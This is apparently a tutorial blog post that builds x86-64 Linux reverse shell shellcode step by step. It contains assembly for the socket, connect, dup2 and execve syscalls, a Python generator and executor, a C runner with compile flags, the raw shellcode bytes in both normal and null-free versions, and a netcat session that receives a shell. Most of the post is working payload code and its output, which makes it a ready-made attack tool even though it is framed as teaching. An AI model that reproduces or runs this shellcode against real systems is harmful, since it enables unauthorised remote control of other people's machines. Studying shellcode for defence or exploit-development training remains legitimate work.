Previously, we looked at generating execve shellcode. In this article, we will be extending that code to create reverse shell shellcode.
Five steps are needed to do this;
Create a Socket
Create a Sockaddr Struct
Call Connect
Handle Duplication
Call Execve
To call external functions, we will be using syscalls. A syscall is a mechanism that allows a program to request services from the operating system kernel.
Create a Socket
Below is the socket functions signature, along with the relevant parameters we need set.
int socket( // Syscall number 41 RAX = 41
int domain, // Set to AF_INET for IPv4 RDI = 2
int type, // SOCK_STREAM for TCP RSI = 1
int protocol // Set to zero for default RDX = 0
);
The following ASM code will make the system call, and save the socket descriptor to the RDI register.
// Create a socket
mov rax, 41 // Syscall number for socket
mov rdi, 2 // AF_INET
mov rsi, 1 // SOCK_STREAM
xor rdx, rdx // Protocol 0
syscall // Make our socket syscall
mov rdi, rax // Save the socket file descriptor
Create a Sockaddr Struct
Next, we need to convert the IP address and port we want to connect to into network byte order. This can be done with the following code.
import socket
import struct
ip_address = "127.0.0.1"
port = 4444
family = socket.AF_INET
ip_network_order = socket.inet_aton(ip_address)
port_network_order = socket.htons(port)
family_network_order = struct.pack("!H", family)
reversed_ip = ip_network_order[::-1].hex()
print(f"IP Address: 0x{reversed_ip}")
reversed_port_family = port_network_order.to_bytes(2, 'big') + family_network_order
print(f"Port + Family: 0x{reversed_port_family.hex()}")
Running this code will give us the values we need for the Sockaddr struct:
python3 convert_ip.py
IP Address: 0x0100007f
Port + Family: 0x5c110002
We push these values to the stack, and get a pointer to the struct address in the RSI register.
// Push socketaddr structure to stack
push 0x0100007f // IP address (127.0.0.1 in network byte order)
mov rax, 0x5c110002 // Port and family (port=4444, AF_INET)
push rax // Push the rest of sockaddr
mov rsi, rsp // Load address of sockaddr into RSI
Call Connect
The connect function takes pointers to the previously created socket handle, and sockaddr struct.
int connect( // RAX = 42
int sockfd, // RDI = Pointer to the socket we created in step 1
const struct sockaddr *addr, // RSI = Pointer to socketaddr struct we created in step 2
socklen_t addrlen // RDX = The length of our sockaddr structure (16)
);
We can call connect using the following ASM code.
// Call connect()
mov rdx, 16 // Length of sockaddr
mov rax, 42 // Syscall number for connect
syscall // Perform connect syscall
At this point, the code should successfully connect back to us.
Handle Duplication
Next, we use dup2 to duplicate the stdin/stdout/stderr file descriptors to our socket handle. This will ensure any IO is redirected over our network socket.
int dup2( // RAX = 33 (syscall number for dup2)
int oldfd, // Our existing socket file descriptor
int newfd // STDIN (0), STDOUT (1) ,STDERR(2) descriptors
);
We can implement this using a simple loop.
// Redirect stdin, stdout, stderr to the socket
mov rsi, 0 // Redirect stdin
dup_loop:
mov rax, 33 // Syscall number for dup2
syscall // Duplicate socket file descriptor
inc rsi // Increment rsi (0 -> 1 -> 2)
cmp rsi, 3 // Check if all descriptors are redirected
jne dup_loop // Repeat until stdin, stdout, stderr are done
Call Execve
Finally, we can call execve to convert the current process into /bin/sh. Given our STDIN/STDOUT is already redirected to the network socket this will yeild a shell!
// Call execve
xor rsi,rsi // Zero RSI (argument vector). Also acts as NULL byte.
push rsi // Push NULL byte to stack
mov rdi,0x68732f2f6e69622f // bin//sh string to RDI
push rdi // Push the /bin//sh string to the stack
push rsp // Push stack pointer to the stack. This now points to the /bin/sh string
pop rdi // Pop the pointer to the /bin/sh string back into RDI
xor rdx,rdx // Zero RDX (environment vector)
push 59 // Syscall number into RDX
pop rax // Syscall number into RDX
syscall // make our execve system call
Putting it all Together
The following code Python code will generate our shellcode. Note, that when running the code in GDB, you may need to exit before the shell spawns properly.
import keystone
import mmap
import ctypes
import os
import sys
import time
import threading
import subprocess
asm_code = """
int3 // Software breakpoint. Leave this here. It will be removed from the printed output.
// Create a socket
mov rax, 41 // Syscall number for socket
mov rdi, 2 // AF_INET
mov rsi, 1 // SOCK_STREAM
xor rdx, rdx // Protocol 0
syscall // Make our socket syscall
mov rdi, rax // Save the socket file descriptor
// Push socketaddr structure to stack
push 0x0100007f // IP address (127.0.0.1 in network byte order)
mov rax, 0x5c110002 // Port and family (port=4444, AF_INET)
push rax // Push the rest of sockaddr
mov rsi, rsp // Load address of sockaddr into rsi
// Call connect()
mov rdx, 16 // Length of sockaddr
mov rax, 42 // Syscall number for connect
syscall // Perform connect syscall
// Redirect stdin, stdout, stderr to the socket
mov rsi, 0 // Redirect stdin
dup_loop:
mov rax, 33 // Syscall number for dup2
syscall // Duplicate socket file descriptor
inc rsi // Increment rsi (0 -> 1 -> 2)
cmp rsi, 3 // Check if all descriptors are redirected
jne dup_loop // Repeat until stdin, stdout, stderr are done
// Call execve
xor rsi,rsi // Zero RSI (argument vector). Also acts as NULL byte.
push rsi // Push NULL byte to stack
mov rdi,0x68732f2f6e69622f // bin//sh string to RDI
push rdi // Push the /bin//sh string to the stack
push rsp // Push stack pointer to the stack. This now points to the /bin/sh string
pop rdi // Pop the pointer to the /bin/sh string back into RDI
xor rdx,rdx // Zero RDX (environment vector)
push 59 // Syscall number into RDX
pop rax // Syscall number into RDX
syscall // make our execve system call
"""
ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64)
encoding, count = ks.asm(asm_code)
machine_code = bytearray(encoding)
num_bytes = len(machine_code)
formatted_hex = ''.join(f'\\x{byte:02x}' for byte in machine_code)
# Print shellcode and size, without the software breakpoint
print("Shellcode: " + formatted_hex[4:])
print("Shellcode length: " + str(num_bytes-1))
input("Press any key to continue...")
page_size = mmap.PAGESIZE
mem = mmap.mmap(-1, page_size, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
mem.write(machine_code)
pid = os.getpid()
print(f"Process ID: {pid}")
mem_address = hex(ctypes.addressof(ctypes.c_char.from_buffer(mem)))
gdb_command = f"gdb -q -p {pid} -ex 'break *{mem_address}' -ex 'continue'"
prototype = ctypes.CFUNCTYPE(None)
mem_ptr = prototype(ctypes.addressof(ctypes.c_char.from_buffer(mem)))
def execute_machine_code():
print("Executing machine code asynchronously...")
time.sleep(3)
mem_ptr()
execution_thread = threading.Thread(target=execute_machine_code)
execution_thread.start()
print("Running GDB")
os.system(gdb_command)
execution_thread.join()
mem.close()
Running the code produces our shellcode:
./bin/python3 exploit.py
Shellcode: \xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48\x31\xd2\x0f\x05\x48\x89\xc7\x68\x7f\x00\x00\x01\x48\xc7\xc0\x02\x00\x11\x5c\x50\x48\x89\xe6\x48\xc7\xc2\x10\x00\x00\x00\x48\xc7\xc0\x2a\x00\x00\x00\x0f\x05\x48\xc7\xc6\x00\x00\x00\x00\x48\xc7\xc0\x21\x00\x00\x00\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\x75\xee\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x6a\x3b\x58\x0f\x05
Shellcode length: 110
Press any key to continue...
The shellcode created can be imported into a C runner for execution.
int main(int argc, char **argv)
{
char code[] = "\xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48\x31\xd2\x0f\x05\x48\x89\xc7\x68\x7f\x00\x00\x01\x48\xc7\xc0\x02\x00\x11\x5c\x50\x48\x89\xe6\x48\xc7\xc2\x10\x00\x00\x00\x48\xc7\xc0\x2a\x00\x00\x00\x0f\x05\x48\xc7\xc6\x00\x00\x00\x00\x48\xc7\xc0\x21\x00\x00\x00\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\x75\xee\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x6a\x3b\x58\x0f\x05";
int (*func)();
func = (int (*)()) code;
(int)(*func)();
return 0;
}
This can be compiled with:
gcc runner.c -o runner -fno-stack-protector -z execstack -no-pie
Setting up a netcat listener and executing the code, we should receive our shell.
nc -lvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 60284
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),107(bluetooth),115(scanner),127(lpadmin),135(wireshark),137(kaboxer),138(vboxsf)
Going Null Free
There are a number of modifications that need to made to make the shellcode null free. I’ve implemented these below. This adds 8 bytes to the resulting shellcode.
import keystone
import mmap
import ctypes
import os
import sys
import time
import threading
import subprocess
asm_code = """
int3 // Software breakpoint. Leave this here. It will be removed from the printed output.
// Create a socket
//mov rax, 41 // Syscall number for socket (NULL)
push 41
pop rax
//mov rdi, 2 // AF_INET (NULL)
push 2 // null free
pop rdi // null free
//mov rsi, 1 // SOCK_STREAM (NULL)
push 1 // null free
pop rsi // null free
xor rdx, rdx // Protocol 0
syscall // Make our socket syscall
mov rdi, rax // Save the socket file descriptor
// Push socketaddr structure to stack
//push 0x0100007f // IP address (127.0.0.1 in network byte order) (NULL)
mov rax, 0x11111111ffffffff // some maths to encode the address without null bytes
mov rbx, 0x11111111FEFFFF80
sub rax, rbx
push rax
//mov rax, 0x5c110002 // Port and family (port=4444, AF_INET) (NULL)
mov rax, 0x11111111ffffffff
mov rbx, 0x11111111A3EEFFFD
sub rax, rbx
push rax // Push the rest of sockaddr
mov rsi, rsp // Load address of sockaddr into rsi
//Call connect()
//mov rdx, 16 // Length of sockaddr (NULL)
push 16
pop rdx
//mov rax, 42 // Syscall number for connect (NULL)
push 42
pop rax
syscall // Perform connect syscall
// Redirect stdin, stdout, stderr to the socket
// mov rsi, 0 // Redirect stdin (NULL)
xor rsi,rsi
dup_loop:
// mov rax, 33 // Syscall number for dup2 (NULL)
push 33
pop rax
syscall // Duplicate socket file descriptor
inc rsi // Increment rsi (0 -> 1 -> 2)
cmp rsi, 3 // Check if all descriptors are redirected
jne dup_loop // Repeat until stdin, stdout, stderr are done
// Call execve
xor rsi,rsi // Zero RSI (argument vector). Also acts as NULL byte.
push rsi // Push NULL byte to stack
mov rdi,0x68732f2f6e69622f // bin//sh string to RDI
push rdi // Push the /bin//sh string to the stack
push rsp // Push stack pointer to the stack. This now points to the /bin/sh string
pop rdi // Pop the pointer to the /bin/sh string back into RDI
xor rdx,rdx // Zero RDX (environment vector)
push 59 // Syscall number into RDX
pop rax // Syscall number into RDX
syscall // make our execve system call
"""
ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64)
encoding, count = ks.asm(asm_code)
machine_code = bytearray(encoding)
num_bytes = len(machine_code)
formatted_hex = ''.join(f'\\x{byte:02x}' for byte in machine_code)
# Print shellcode and size, without the software breakpoint
print("Shellcode: " + formatted_hex[4:])
print("Shellcode length: " + str(num_bytes-1))
input("Press any key to continue...")
page_size = mmap.PAGESIZE
mem = mmap.mmap(-1, page_size, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
mem.write(machine_code)
pid = os.getpid()
print(f"Process ID: {pid}")
mem_address = hex(ctypes.addressof(ctypes.c_char.from_buffer(mem)))
gdb_command = f"gdb -q -p {pid} -ex 'break *{mem_address}' -ex 'continue'"
prototype = ctypes.CFUNCTYPE(None)
mem_ptr = prototype(ctypes.addressof(ctypes.c_char.from_buffer(mem)))
def execute_machine_code():
print("Executing machine code asynchronously...")
time.sleep(3)
mem_ptr()
execution_thread = threading.Thread(target=execute_machine_code)
execution_thread.start()
print("Running GDB")
os.system(gdb_command)
execution_thread.join()
mem.close()
This produces the following shellcode.
./bin/python3 null_free.py
Shellcode: \x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\xb8\xff\xff\xff\xff\x11\x11\x11\x11\x48\xbb\x80\xff\xff\xfe\x11\x11\x11\x11\x48\x29\xd8\x50\x48\xb8\xff\xff\xff\xff\x11\x11\x11\x11\x48\xbb\xfd\xff\xee\xa3\x11\x11\x11\x11\x48\x29\xd8\x50\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03\x75\xf2\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x6a\x3b\x58\x0f\x05
Shellcode length: 118
In Conclusion
The script could be modified further to include dynamic IP address and port generation, although I’ll leave that as an exercise for the reader 🙂